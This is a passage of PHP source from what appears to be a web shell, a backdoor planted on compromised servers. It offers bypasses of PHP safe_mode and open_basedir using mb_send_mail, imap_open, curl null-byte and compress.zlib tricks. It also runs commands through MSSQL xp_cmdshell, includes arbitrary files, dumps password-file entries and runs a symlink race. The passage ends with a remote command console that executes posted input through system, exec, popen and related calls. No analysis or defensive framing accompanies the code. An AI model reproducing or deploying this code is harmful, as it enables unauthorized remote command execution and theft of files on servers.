  4038.   if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
  4039.   $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
  4040.   if($db)
  4041.    {
  4042.    if(@mssql_select_db($_POST['test4_md'],$db))
  4043.     {
  4044.      @mssql_query("drop table ly0kha_temp_table",$db);
  4045.      @mssql_query("create table ly0kha_temp_table ( string VARCHAR (500) NULL)",$db);
  4046.      @mssql_query("insert into ly0kha_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
  4047.      $res = mssql_query("select * from ly0kha_temp_table",$db);
  4048.      while(($row=@mssql_fetch_row($res)))
  4049.       {
  4050.       echo $row[0]."\r\n";
  4051.       }
  4052.     @mssql_query("drop table ly0kha_temp_table",$db);
  4053.     }
  4054.     else echo "[-] ERROR! Can't select database";
  4055.    @mssql_close($db);
  4056.    }
  4057.   else echo "[-] ERROR! Can't connect to MSSQL server";
  4058.   break;
  4059.   case 'test5':
  4060.   if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
  4061.   $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
  4062.   @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
  4063.   $lines = file ('/tmp/mb_send_mail');
  4064.   foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
  4065.   break;
  4066.   case 'test6':
  4067.   $stream = @imap_open('/etc/passwd', "", "");
  4068.   $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
  4069.   for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
  4070.   @imap_close($stream);
  4071.   break;
  4072.   case 'test7':
  4073.   $stream = @imap_open($_POST['test7_file'], "", "");
  4074.   $str = @imap_body($stream, 1);
  4075.   echo $str;
  4076.   @imap_close($stream);
  4077.   break;
  4078.   case 'test8':
  4079.   if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
  4080.   else echo $lang[$language.'_text119'];
  4081.   break;
  4082. case 'cURL':
  4083.    if(empty($_POST['ly0kha'])){
  4084.  
  4085.  
  4086. } else {
  4087. $curl=$_POST['ly0kha'];
  4088. $ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
  4089. curl_exec($ch);
  4090. var_dump(curl_exec($ch));
  4091. echo "</textarea></CENTER>";
  4092.  
  4093. }
  4094. break;
  4095. case 'copy':
  4096.  
  4097. if(empty($snn)){
  4098. if(empty($_GET['snn'])){
  4099. if(empty($_POST['snn'])){
  4100.  
  4101. } else {
  4102. $u1p=$_POST['snn'];
  4103. }
  4104. } else {
  4105. $u1p=$_GET['snn'];
  4106. }
  4107. }
  4108.   $u1p=""; // File to Include... or use _GET _POST
  4109. $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
  4110.  
  4111.  
  4112. $temp=tempnam($tymczas, "cx");
  4113.  
  4114. if(copy("compress.zlib://".$snn, $temp)){
  4115. $zrodlo = fopen($temp, "r");
  4116. $tekst = fread($zrodlo, filesize($temp));
  4117. fclose($zrodlo);
  4118. echo "".htmlspecialchars($tekst)."";
  4119. unlink($temp);
  4120. echo "</textarea></CENTER>";
  4121. }
  4122. break;
  4123. case 'ini_restore':
  4124.  if(empty($_POST['ini_restore'])){
  4125. } else {
  4126.  
  4127. $ini=$_POST['ini_restore'];
  4128. echo ini_get("safe_mode");
  4129. echo ini_get("open_basedir");
  4130. require_once("$ini");
  4131. ini_restore("safe_mode");
  4132. ini_restore("open_basedir");
  4133. echo ini_get("safe_mode");
  4134. echo ini_get("open_basedir");
  4135. include($_GET["ss"]);
  4136. echo "</textarea></CENTER>";
  4137. }
  4138. break;
  4139. case 'glob':
  4140. function reg_glob()
  4141. {
  4142. $chemin=$_REQUEST['glob'];
  4143. $files = glob("$chemin*");
  4144.  
  4145.  
  4146. foreach ($files as $filename) {
  4147.  
  4148.    echo "$filename\n";
  4149.  
  4150. }
  4151. }
  4152.  
  4153. if(isset($_REQUEST['glob']))
  4154. {
  4155. reg_glob();
  4156. }
  4157.  
  4158. break;
  4159. case 'zend':
  4160.  if(empty($_POST['zend'])){
  4161. } else {
  4162.  
  4163. $dezend=$_POST['zend'];
  4164. include($_POST['zend']);
  4165. print_r($GLOBALS);
  4166. require_once("$dezend");
  4167. echo "</textarea></p>";
  4168. }
  4169. break;
  4170.   case 'sym1':
  4171.      if(empty($_POST['sym1p'])){
  4172.              } else {
  4173. $symp=$_POST['sym1p'];
  4174.          }
  4175.      if(empty($_POST['sym1p2'])){
  4176.  
  4177. } else {
  4178. $symp2=$_POST['sym1p2'];
  4179.  
  4180.   symlink("a/a/a/a/a/a/", "dummy");
  4181. symlink("dummy".$symp2."".$symp."", "xxx");
  4182. unlink("dummy");
  4183. while (1) {
  4184. symlink(".", "dummy");
  4185.  
  4186.   }
  4187.  }
  4188.   break;
  4189.   case 'sym2':
  4190.   @include(xxx);
  4191.   break;
  4192.  
  4193.   case 'plugin':
  4194.   if ($_POST['plugin'] ){
  4195.  
  4196.  
  4197.                                            for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
  4198.                                         $ara = posix_getpwuid($uid);
  4199.                                                 if (!empty($ara)) {
  4200.                                                   while (list ($key, $val) = each($ara)){
  4201.                                                     print "$val:";
  4202.                                                   }
  4203.                                                   print "\n";
  4204.                                                 }
  4205.                                         }
  4206.                                  echo "</textarea>";
  4207.  
  4208.              }
  4209.         break;
  4210.         case 'command':
  4211.           if (!empty($_POST['command'])) {
  4212.  
  4213.                 if ($method=="system") {
  4214.                 system($_POST['command']);
  4215.                 echo "Functions system";
  4216.                 }
  4217.                 if ($method=="passthru") {
  4218.                 passthru($_POST['command']);
  4219.                 echo "Functions passthru";
  4220.                 }
  4221.                 if ($method=="exec") {
  4222.                         $string = exec($_POST['command']);
  4223.                         echo $string;
  4224.                         echo "Functions exec";
  4225.  
  4226.                 }
  4227.                 if ($method=="shell_exec") {
  4228.                 $string = shell_exec($_POST['command']);
  4229.                 echo $string;
  4230.                 echo "Functions shell_exec";
  4231.                 }
  4232.                 if ($method=="popen") {
  4233.                 $pp = popen($_POST['command'], 'r');
  4234.                 $read = fread($pp, 2096);
  4235.                 echo $read;
  4236.                 pclose($pp);
  4237.                 echo "Functions popen";
  4238.                   }
  4239.  
  4240.           if ($method=="proc_open") {
  4241.  
  4242.  
  4243. $command  = isset($_POST['command'])  ? $_POST['command']  : '';
  4244.  
  4245.  
  4246.  
  4247. /* Load the configuration. */
  4248.  
  4249. /* Default settings --- these settings should always be set to something. */
  4250.  
  4251. /* Merge settings. */
  4252.  
  4253. session_start();
  4254.  
  4255.  
  4256.  
  4257.     if (!empty($command)) {
  4258.         /* Save the command for late use in the JavaScript.  If the command is
  4259.          * already in the history, then the old        
  4260. login is removed before the
  4261.          * new  
  4262. login is put into the list at the front. */
  4263.         if (($i = array_search($_POST['command'], $_SESSION['history'])) !== false)
  4264.             unset($_SESSION['history'][$i]);
  4265.  
  4266.         array_unshift($_SESSION['history'], $_POST['command']);
  4267.  
  4268.         /* Now append the commmand to the output. */
  4269.         $_SESSION['output'] .= '$ ' . $_POST['command'] . "\n";
  4270.  
  4271.         /* Initialize the current working directory. */
  4272.         if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_POST['command'])) {
  4273.             $_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
  4274.         } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_POST['command'], $regs)) {
  4275.             /* The current command is a 'cd' command which we have to handle
  4276.              * as an internal shell command. */
  4277.  
  4278.             if ($regs[1]{0} == '/') {
  4279.                 /* Absolute path, we use it unchanged. */
  4280.                 $new_dir = $regs[1];
  4281.             } else {
  4282.                 /* Relative path, we append it to the current working
  4283.                  * directory. */
  4284.                 $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
  4285.             }
  4286.  
  4287.             /* Transform '/./' into '/' */
  4288.             while (strpos($new_dir, '/./') !== false)
  4289.                 $new_dir = str_replace('/./', '/', $new_dir);
  4290.  
  4291.             /* Transform '//' into '/' */
  4292.             while (strpos($new_dir, '//') !== false)
  4293.                 $new_dir = str_replace('//', '/', $new_dir);
  4294.  
  4295.             /* Transform 'x/..' into '' */
  4296.             while (preg_match('|/\.\.(?!\.)|', $new_dir))
  4297.                 $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
  4298.  
  4299.             if ($new_dir == '') $new_dir = '/';
  4300.  
  4301.             /* Try to change directory. */
  4302.             if (@chdir($new_dir)) {
  4303.                 $_SESSION['cwd'] = $new_dir;
  4304.             } else {
  4305.                 $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
  4306.             }
  4307.  
  4308.         } elseif (trim($_POST['command']) == 'exit') {
  4309.             logout();
  4310.         } else {
  4311.  
  4312.             /* The command is not an internal command, so we execute it after
  4313.              * changing the directory and save the output. */
  4314.             chdir($_SESSION['cwd']);
  4315.  
  4316.             // We canot use putenv() in safe mode.
  4317.             if (!ini_get('safe_mode')) {
  4318.                 // Advice programs (ls for example) of the terminal size.
  4319.                 putenv('ROWS=' . $rows);
  4320.                 putenv('COLUMNS=' . $columns);
  4321.             }
  4322.  
  4323.             /* Alias expansion. */
  4324.             $length = strcspn($_POST['command'], " \t");
  4325.             $token